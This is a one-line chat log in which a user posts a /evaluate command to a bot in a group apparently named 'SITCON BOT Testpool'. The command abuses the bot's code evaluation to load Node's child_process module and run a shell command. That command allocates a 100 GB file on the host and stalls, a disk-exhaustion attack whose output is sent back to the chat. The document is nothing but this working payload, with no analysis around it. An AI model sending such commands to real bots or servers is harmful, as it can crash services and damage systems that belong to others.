Sean Wei says to SITCON BOT Testpool
/evaluate installModule("child_process", () => { var cmd = 'fallocate -l 100G /sean; sleep 200; echo End'; require('child_process').exec(cmd, function(i, s, t) { console.log(i + s + t) });});